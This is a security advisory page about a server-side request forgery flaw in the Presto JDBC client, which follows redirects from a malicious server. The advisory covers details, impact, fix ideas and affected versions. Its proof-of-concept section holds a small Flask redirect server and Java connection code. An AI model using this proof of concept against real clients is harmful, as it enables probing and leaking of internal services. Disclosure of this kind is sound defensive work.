Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS14bTd4LWYzdzItNGhqbc4AA2Ob
Presto JDBC Server-Side Request Forgery by redirect
Summary
Presto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can construct a redirect response that Presto JDBC client will follow and view sensitive information from highly sensitive internal servers or perform a local port scan.
Details
Presto JDBC client uses OkHttp to send POST /v1/statement
and GET /v1/info
requests to the remote Presto server. And OkHttp will follow 301 and 302 redirect by default. In addition, JDBC will manually follow 307 and 308 redirect. Therefore, if a malicious server returns a 30x redirect, JDBC client will follow the redirect and cause SSRF.
For unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.
The relevant code is in file path /presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java
and function StatementClientV1
.
The flowchart is as follows:
PoC
Running an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/v1/statement', methods=['POST'])
def redirect_to_interal_server():
return redirect('http://127.0.0.1:8888', code=302)
if __name__ == '__main__':
app.run(host="0.0.0.0",port=8000)
Connecting to the malicious server using JDBC:
String url = "jdbc:presto://<ip>:<port>";
Properties properties = new Properties();
properties.setProperty("user", "root");
try {
Connection connection = DriverManager.getConnection(url, properties);
Statement stmt = connection.createStatement();
ResultSet res = stmt.executeQuery("show catalogs");
while(res.next()) {
System.out.println(res.getString(1));
}
} catch (Exception e) {
e.printStackTrace();
}
Pwned!
Impact
When the target remote Presto server to be connected is controllable, an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan.
Others
Regarding the fix suggestions, the redirect issue we can consider directly disable the following redirect. If not, we can add a jdbc parameter such as allowRedirect. Like MySQL JDBC caused arbitrary file reading before, its solution is adding the allowLoadLocalInfile parameters. Disable redirect by default, and there is a need to open. The nextUri issue is similar. If we can only take the path of nextUri instead of the complete URL, join the host and path. If not, add a jdbc parameter too.
I think these two vulnerabilities are worth fixing. There is no effective way to avoid this vulnerability at the server side, and the only way to fix them is modifying the jdbc source code. I think many other vendors also have this issue.
I hope to apply for CVEs and give security thanks in the vulnerability bulletin to prove my work, thank you.
Vulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance
Permalink: https://github.com/advisories/GHSA-xm7x-f3w2-4hjmJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14bTd4LWYzdzItNGhqbc4AA2Ob
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 7.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
Identifiers: GHSA-xm7x-f3w2-4hjm
References:
- https://github.com/prestodb/presto/security/advisories/GHSA-xm7x-f3w2-4hjm
- https://github.com/advisories/GHSA-xm7x-f3w2-4hjm
Blast Radius: 20.1
Affected Packages
maven:com.facebook.presto:presto-jdbc
Dependent packages: 33Dependent repositories: 441
Downloads:
Affected Version Ranges: <= 0.283
No known fixed version
All affected versions: 0.144.1, 0.144.2, 0.144.3, 0.144.4, 0.144.5, 0.144.6, 0.144.7, 0.144.8, 0.152.1, 0.152.2, 0.152.3, 0.157.1, 0.223.1, 0.231.1, 0.233.1, 0.234.1, 0.234.2, 0.234.3, 0.235.1, 0.236.1, 0.237.1, 0.237.2, 0.238.1, 0.238.2, 0.239.1, 0.239.2, 0.239.3, 0.240.1, 0.242.1, 0.243.1, 0.243.2, 0.243.3, 0.243.4, 0.244.1, 0.245.1, 0.248.1, 0.249.1, 0.251.1, 0.253.1, 0.254.1, 0.259.1, 0.260.1, 0.263.1, 0.264.1, 0.265.1, 0.266.1, 0.271.1, 0.272.1, 0.273.1, 0.273.2, 0.273.3, 0.273.4, 0.276.1, 0.276.2, 0.278.1